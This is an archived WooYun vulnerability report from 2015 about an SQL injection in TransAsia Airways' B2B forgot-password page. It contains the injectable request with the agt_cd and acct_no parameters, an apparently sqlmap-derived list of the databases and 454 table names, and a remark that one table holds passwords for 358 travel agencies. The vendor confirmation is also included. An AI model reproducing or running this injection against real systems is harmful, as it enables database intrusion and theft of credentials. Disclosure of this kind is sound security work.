乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
复兴航空
问题出在:http://**.**.**.**/GE/GE/default.aspx(復興航空B2B系統)点击忘记密码,在公司帐号和公司代码处有SQL注入
直接抓包,通过get型传递数据
http://**.**.**.**/GE/GE/PG/HE/HEP2/HEP2B0/HEP2B0.aspx?AJAX=1&do_action=agt_cd_check&agt_cd=dsfsd*&acct_no=aa&_ele_list=XML&time=1444493269143
参数为agt_cd或者acct_no
17库
available databases [17]:[*] ABACUS[*] APPQOSSYS[*] BR00[*] DBSNMP[*] FLOWS_030000[*] FLOWS_FILES[*] OLAPSYS[*] OUTLN[*] SB00[*] SCOTT[*] SYS[*] SYSTEM[*] TSMSYS[*] WK_TEST[*] WKSYS[*] WMSYS[*] XDB
当前库ABACUS
Database: ABACUS[454 tables]+-----------------------+| AGENT_INFO || AP170 || AX_AGENT || BA_001 || CHINAPAYCHECKEDSTATUS || CHINAPAYORDER || CHINAPAYORDERDETAIL || CHINAPAY_HE22 || CHINAPAY_HE28 || CHINAPAY_HE32 || CHINAPAY_HE33 || CHINAPAY_HE35 || CHINAPAY_HE36 || CHINAPAY_HE37 || CM001 || CM002 || CM003 || CM004 || CM005 || CM006 || CM007 || CM008 || CM009 || CM010 || CM011 || CM012 || CM013 || CM014 || CM015 || CM016 || CM017 || CM018 || CM019 || CM020 || CM021 || CM022 || CM023 || CM024 || CM025 || CM026 || CM027 || CM028 || CM029 || CM030 || CM031 || CM033 || CM035 || CM036 || CM037 || CM_001 || CM_001_0322_C || CM_001_D || CM_001_F || CM_002 || CM_003 || CM_004 || CM_004_D || CM_004_F || CM_005 || CM_006 || CM_007 || CM_008 || CM_010 || CM_010_D || CM_010_F || CM_011 || CM_012 || CM_013 || CM_014 || CM_015 || CM_016 || CM_017 || CM_099 || CM_905 || CM_906 || CM_AAB || DELAYTICKETINFO || EC01 || EC02 || EC03 || ERROR_FOREIGNFARE || FOREIGNFARE || FOREIGNFARE_20110826 || FOREIGNFARE_COPY || FOREIGNFARE_TEMP || GB23 || GDC_R_ACCOUNT_GROUP || GDC_R_GROUP_SYS_FUNC || GDC_T_ACCOUNT || GDC_T_AUTHORIZE || GDC_T_GROUP || GDC_T_LISTITEM || GDC_T_LISTITEMX || GDC_T_SYS_FUNC || GDC_T_SYS_MENU || GDC_T_SYS_TYPE || GDC_T_SERIALNUMBER || H278 || HE01 || HE01T || HE02 || HE02T || HE03 || HE04 || HE05 || HE06 || HE07 || HE08 || HE09 || HE10 || HE100 || HE101 || HE102 || HE102B || HE103 || HE105 || HE106 || HE107 || HE108 || HE109 || HE11 || HE110 || HE110_BK || HE111 || HE112 || HE113 || HE114 || HE115 || HE116 || HE117 || HE118 || HE119 || HE11_F || HE12 || HE123 || HE125 || HE126 || HE127 || HE127_F || HE128 || HE12_0321_C || HE12_0322R_C || HE12_0328R || HE12_D || HE12_F || HE13 || HE130 || HE130_F || HE131 || HE131_0322R || HE131_0328R || HE132 || HE133 || HE135 || HE136 || HE137 || HE138 || HE139 || HE13_1 || HE13_F || HE13_T || HE14 || HE140 || HE142 || HE144 || HE145 || HE146 || HE147 || HE148 || HE149 || HE15 || HE150 || HE151 || HE152 || HE153 || HE154 || HE155 || HE156 || HE157 || HE158 || HE159 || HE16 || HE160 || HE161 || HE162 || HE162_D || HE162_F || HE163 || HE164 || HE166 || HE167 || HE168 || HE169 || HE17 || HE170 || HE171 || HE171_T || HE172 || HE172_T || HE173 || HE174 || HE175 || HE176 || HE177 || HE178 || HE179 || HE18 || HE180 || HE181 || HE182 || HE183 || HE184 || HE185 || HE186 || HE187 || HE19 || HE190 || HE191 || HE192 || HE193 || HE194 || HE195 || HE196 || HE197 || HE198 || HE199 || HE20 || HE200 || HE201 || HE202 || HE203 || HE204 || HE206 || HE207 || HE208 || HE209 || HE21 || HE210 || HE211 || HE213 || HE214 || HE215 || HE216 || HE216_T || HE217 || HE218 || HE219 || HE22 || HE220 || HE221 || HE222 || HE223 || HE224 || HE225 || HE226 || HE227 || HE228 || HE229 || HE22B || HE23 || HE230 || HE231 || HE232 || HE233 || HE234 || HE235 || HE236 || HE237 || HE238 || HE239 || HE23_0321_C || HE23_0322R_C || HE23_D || HE23_F || HE24 || HE240 || HE241 || HE242 || HE243 || HE244 || HE245 || HE246 || HE247 || HE248 || HE249 || HE24_0213 || HE24_0321 || HE24_0322R || HE24_0328R || HE25 || HE250 || HE251 || HE252 || HE254 || HE255 || HE256 || HE257 || HE258 || HE259 || HE26 || HE260 || HE261 || HE262 || HE263 || HE264 || HE265 || HE266 || HE267 || HE268 || HE269 || HE27 || HE270 || HE271 || HE272 || HE273 || HE274 || HE275 || HE276 || HE277 || HE28 || HE30 || HE31 || HE32 || HE33 || HE34 || HE35 || HE36 || HE37 || HE37_B || HE38 || HE39 || HE40 || HE41 || HE42 || HE43 || HE44 || HE45 || HE46 || HE47 || HE48 || HE49 || HE50 || HE50_B || HE51 || HE54 || HE55 || HE56 || HE57 || HE59 || HE60 || HE61 || HE62 || HE63 || HE64 || HE65 || HE66 || HE67 || HE68 || HE69 || HE70 || HE71 || HE72 || HE73 || HE74 || HE75 || HE76 || HE77 || HE78 || HE79 || HE80 || HE81 || HE84 || HE85 || HE86 || HE87 || HE88 || HE91 || HE92 || HE93 || HE94 || HE95 || HE96 || HE96_0322_C || HE96_D || HE96_F || HE97 || HE98 || HE99 || HE_T1 || HE_TEMP || HL01 || HL02 || HL03 || HL04 || HL05 || HL06 || HL07 || HL08 || HM01 || HM02 || HM03 || HM04 || ISSUETICKETTABLE || LA_000 || LF_000 || PBCATCOL || PBCATEDT || PBCATFMT || PBCATTBL || PBCATVLD || PFVBC01 || PLAN_TABLE || PY_P02 || SA37 || SA38 || SA39 || SA40 || SA41 || SA42 || SA43 || SA44 || SA44_B || SA44_R || SA45 || SA46 || SA47 || SA48 || SA95 || SA96 || SA97 || SA98 || SA99 || SC01 || SC22 || SC23 || SC24 || SC25 || SC26 || TAXINFO || TAXINFO_20110826 || TAXINFO_COPY || TAXINFO_TEMP || TKTTMP || WA02 || WA04 || WA21 || WA21T || WA33 || WA34 || WA35 || _LISTITEM || _LOGINHISTORY || _TEMPLATE || _TRANSACTIONLOG |+-----------------------+
agent_info表,涉及358家旅行社,包括旅行社代码,密码等
DELAYTICKETINFO表(延期票务信息)
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-10-12 15:16
感謝通報
暂无
